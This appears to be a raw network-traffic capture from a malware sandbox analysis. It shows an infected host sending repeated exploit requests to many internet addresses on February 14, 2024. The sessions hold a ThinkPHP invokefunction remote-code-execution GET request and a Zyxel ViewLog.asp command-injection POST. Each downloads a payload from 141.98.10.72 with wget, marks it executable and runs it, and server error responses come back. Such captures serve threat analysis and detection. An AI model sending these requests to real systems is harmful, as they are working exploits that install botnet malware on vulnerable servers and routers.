68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3 Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.15	51420	112.135.219.68	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:00.287610054 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.15	47730	112.74.127.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:00.314832926 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:00.664943933 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.17.5 Date: Wed, 14 Feb 2024 08:29:00 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.17.5</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.15	52534	112.74.59.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:00.651650906 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:00.993341923 CET	318	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:00 GMT Content-Type: text/html Content-Length: 166 Connection: close Via: HTTP/1.1 SLB.12 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.15	34772	112.78.1.57	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.019005060 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:01.385454893 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 14 Feb 2024 08:29:01 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.15	42222	31.136.100.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.524863005 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:02.203002930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:03.578881025 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:06.330862045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:11.962687969 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:22.970382929 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.009812117 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.064584970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.15	58000	95.163.71.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.537231922 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:01.772744894 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:06 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.15	32788	94.120.214.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.549957991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.15	55688	112.105.38.98	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.649846077 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:01.969432116 CET	872	IN	Data Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: xhmmhttpsv130-202003

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.15	53240	31.136.98.148	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.723453045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:02.330916882 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:03.546895981 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:06.074811935 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:10.938679934 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.666389942 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.913851976 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.824768066 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.15	51472	112.74.103.111	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.726291895 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:02.084016085 CET	442	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:01 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 181 Keep-Alive: timeout=15, max=300 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h\|~tF

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.15	37918	94.121.222.29	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.797812939 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.15	41914	95.86.101.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:01.976912022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.15	55704	112.105.38.98	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:02.316241980 CET	690	IN	Data Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 78 68 6d 6d 68 74 74 70 73 76 31 33 30 2d 32 30 32 30 30 33 31 30 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 31 36 3a Data Ascii: (null) 400 Bad RequestServer: xhmmhttpsv130-20200310Date: Wed, 14 Feb 2024 16:29:01 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional/

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.15	45294	112.166.250.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.354973078 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:03.645256042 CET	35	IN	HTTP/1.0 301 Redirect
